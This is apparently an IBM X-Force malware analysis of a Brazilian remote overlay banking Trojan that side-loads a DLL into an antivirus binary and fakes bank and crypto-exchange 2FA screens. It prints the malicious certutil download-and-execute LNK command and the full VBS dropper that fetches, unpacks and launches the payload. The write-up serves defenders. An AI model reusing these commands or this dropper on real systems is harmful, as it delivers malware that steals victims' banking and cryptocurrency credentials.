In the first article of this two-part series, we covered recent infection and fraud tactics, techniques and procedures (TTPs) used against Brazilian internet users. In this second post, we’ll cover the analysis of a popular remote overlay Trojan used by financial cybercrime actors in Brazil.
In This Article
Remote overlay malware is quite prolific and generic, and although it happens now and then, it is generally rare to find financial malware in Brazil that could be deemed special or sophisticated. So what’s special about this particular variant? To begin, the dynamic link library (DLL) hijacking technique is not very common, although we have seen it before in Brazil. More interestingly, it seems that the malware’s operators are no longer focused on banks alone; they are now also interested in stealing users’ cryptocurrency exchange accounts, which ties in well with the growing appetite financial cybercrime has for cryptocurrency in Brazil.
Compromising Brazilian Users One Remote Session at a Time
IBM X-Force research follows the Brazilian threat landscape on an ongoing basis. In recent analyses, our team observed a new malware variant from the remote overlay family infecting users in the region.
Remote overlay Trojans are very common among Brazilian fraudsters who target local users. A recent generic variant we analyzed is able to remotely control infected devices using a DLL hijacking technique to load its malicious code into a legitimate binary file of a free antivirus program.
The malicious DLL, which is written in the Delphi programming language typical of Brazilian malware, contains overlay images that the malware plasters over the screen after an infected user authenticates an online banking session. The screens are made to match the look and feel of the victim’s bank and trick victims into providing personal information and two-factor authentication (2FA) elements.
Read the white paper: Preserving trust in digital financial services
Rising Interest in Cryptocurrency
Cryptocurrency trading accounts are becoming more popular than traditional brokerage accounts in Brazil — a trend that local fraudsters are likely familiar with and poised to exploit.
Variants we analyzed in recent campaigns against the major banks in Brazil also targeted cryptocurrency exchange platforms. The attack method is similar to how banks are targeted: by stealing the user’s account credentials, taking over their account and transferring their money to the criminals’ accounts.
A Typical Infection Routine
A look into the infection routine of this remote overlay Trojan shows that the initial compromise happens when a potential victim is lured into downloading what he or she believes to be an official invoice. The file is an archive that harbors the malicious scripts that will ultimately infect the device. Below is a summary of the typical infection tactic:
- The victim uses a search engine to find his or her provider’s website and pay a monthly invoice. Instead of the genuine website, the first result is a malicious page that attackers have boosted with paid efforts. The victim accesses that page and keys in his or her identification details to fetch the invoice.
- The victim unknowingly downloads a malicious LNK file — a Windows shortcut file — archived inside a ZIP file purporting to be from DETRAN, the ministry of transportation in Brazil.
- The LNK file contains a command that will download a malicious Visual Basic (VBS) script from a remote server and run it with a legitimate Windows program, certutil.
- The malicious VBS script downloads an additional ZIP file from the attacker’s remote server, this time containing the malware’s malicious DLL payload as well as a legitimate binary file of a free antivirus program it will use to hide the DLL.
- The VBS script executes the malware, infecting the device.
- Once deployed, the Trojan uses a DLL hijacking technique to load its malicious DLL into the legitimate binary of the antivirus program. This roundabout infection routine helps the malware evade detection by security controls.
- After completing the installation, the malware monitors the victim’s browser and goes into action when the victim navigates to a targeted online banking website or cryptocurrency exchange platform.
- The malicious DLL component gives the malware its remote control capabilities.
Zooming In on the Malicious LNK File
A closer look at the LNK file reveals the way it abuses certutil, which is installed as part of Certificate Services.
First, the malicious script is downloaded from the remote server under the name “tudodebom”:
“C:\Windows\System32\cmd.exe /V /C certutil.exe -urlcache -split -f “https://remoteserver/turbulencianoar/tudodebom.txt” %temp%\tudodebom.txt && cd %temp% && rename “tudodebom.txt“ |
Scroll to view full table
- -urlcache displays or deletes URL cache entries.
- -split -f forces fetching of a specific URL and updating of the cache.
Once retrieved, the malware changes the file’s name and extension from “tudodebom.txt” to “JNSzlEYAIubkggX.vbs”:
“JNSzlEYAIubkggX.vbs” && C:\windows\system32\cmd.exe /k JNSzlEYAIubkggX.vbs“ |
Scroll to view full table
The LNK file invokes the Windows command line (CMD) and executes certutil.exe to download a TXT file (.vbs) from a remote host:
hXXps://remoteserver/turbulencianoar/tudodebom.txt |
Scroll to view full table
Lastly, the malware executes the malicious VBS script.
Examining the VBS Script
The VBS script downloads the ZIP archive containing the malware payload. It then deploys it on the victim’s device in a directory with the following naming pattern:
“C:\AV product_” + RandomName + “\”
After that process is complete, the script executes the legitimate, but poisoned, binary that will load the malicious DLL and start a connection to the attacker’s command and control (C&C) server.
Interesting elements in this routine include:
- The use of legitimate remote servers to host attack tools;
- The abuse of a legitimate binary from an existing antivirus program to hide the malware’s DLL; and
- The naming convention of the malware, which can make the malware easier to detect and quarantine on infected devices.
Upon analyzing the malware, we found the VBS script that the Trojan uses to deploy its malicious DLL to contain the following:
Dim ubase, randname, exerandom, deffolder, filesuccess, filezip, fileexe, filedll
Set objShell = CreateObject( “WScript.Shell” )
ubase = “https://remoteserver/turbulencianoar/AuZwaaU.zip”
randname = getrandomstring()
exerandom = “AV product.SystrayStartTrigger-” + randname
filezip = “AuZwaaU.zip”
deffolder = “C:\AV product_” + randname + “\”
filesuccess = objShell.ExpandEnvironmentStrings(“%TEMP%”) + “\java_install.log”
fileexe = “AuZwaaU.exe”
filedll = “AuZwaaU.sys”
Set objFSO = CreateObject(“Scripting.FileSystemObject”)
If (objFSO.FileExists(filesuccess)) Then
WScript.Quit
End If
If not (objFSO.FileExists(filezip)) Then
Set objFile = objFSO.CreateTextFile(filesuccess, True)
objFile.Write ” ”
objFile.Close
‘WScript.Echo msg
dim xHttp: Set xHttp = createobject(“Microsoft.XMLHTTP”)
dim bStrm: Set bStrm = createobject(“Adodb.Stream”)
xHttp.Open “GET”, ubase, False
xHttp.Send
with bStrm
.type = 1
.open
.write xHttp.responseBody
.savetofile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & filezip, 2
end with
WScript.Sleep 5000
set objShellApp = CreateObject(“Shell.Application”)
set FilesInZip=objShellApp.NameSpace(objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & filezip).items
objShellApp.NameSpace(objShell.ExpandEnvironmentStrings(“%TEMP%”)).CopyHere(FilesInZip)
WScript.Sleep 5000
objFSO.DeleteFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & filezip
objFSO.CreateFolder deffolder
WScript.Sleep 3000
objFSO.MoveFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & fileexe, deffolder & exerandom & “.exe”
objFSO.MoveFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & filedll, deffolder & “AV product.OE.NativeCore.dll”
objFSO.MoveFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\msvcp120.sys”, deffolder & “msvcp120.dll”
objFSO.MoveFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\msvcr120.sys”, deffolder & “msvcr120.dll”
objFSO.MoveFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\LOG”, deffolder & “LOG”
WScript.Sleep 5000
Set objFSO = CreateObject(“Scripting.FileSystemObject”)
Set objShell = CreateObject( “WScript.Shell” )
outFile = objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & randname & “.bat”
Set objFile = objFSO.CreateTextFile(outFile,True)
objFile.Write “@echo off” & vbCrLf
objFile.Write “@cd ” & deffolder & vbCrLf
objFile.Write “start ” & exerandom & “.exe” & vbCrLf
objFile.Close
objShell.Exec(objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & randname & “.bat”)
WScript.Sleep 10000
objFSO.DeleteFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & randname & “.bat”
Set objShell = Nothing
Set objFSO = Nothing
Set objShellApp = Nothing
End If
Function getrandomstring()
Dim intMax, k, intValue, strChar, strName
Const Chars = “abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ”
intMax = 6
Randomize()
strName = “”
For k = 1 To intMax
intValue = Fix(62 * Rnd())
strChar = Mid(Chars, intValue + 1, 1)
Randomize()
intValue = Fix(62 * Rnd())
strChar = strChar & Mid(Chars, intValue + 1, 1)
strName = strName & strChar
If (k < 6) Then
strName = strName & “”
End If
Next
getrandomstring = strName
End Function |
Scroll to view full table
Remote Overlay Images
Last but not least, the overlay images the malware hosts are no longer exclusive to banks. Our analysis shows that fraudsters in Brazil are just as interested in robbing users of their cryptocurrency.
To accomplish this goal, the threat actors have created a number of overlays to match platforms used in Brazil (we have censored the platform’s logo below). In each case, the attackers prompt the user to verify his or her email address and identity and confirms the user’s security with a fresh one-time password from their tokenization method.
Figure 1: Fake overlay screen asks users to provide information about their identity.
Figure 2: Fake overlay screen asks users to submit a token code.
Overlays for 2FA requests match the targeted platform’s preference of user authentication elements and include single sign-on (SSO) from email and social accounts:
Figure 3: Fake overlay screen asks infected users to use SSO authentication from their webmail/social accounts.
Mitigate Financial Cybercrime Risks
Malware in Brazil is one of the most prolific tactics used by cybercriminals to defraud internet users. Although infection rates can be high for campaigns due to the large number of users affected by each attack, the risks can be mitigated with continued user education and by placing the right controls on user devices to help protect against malware.
Read the white paper: Preserving trust in digital financial services
Security Threat Researcher, IBM Security (Trusteer)
Threat Intelligence Expert, IBM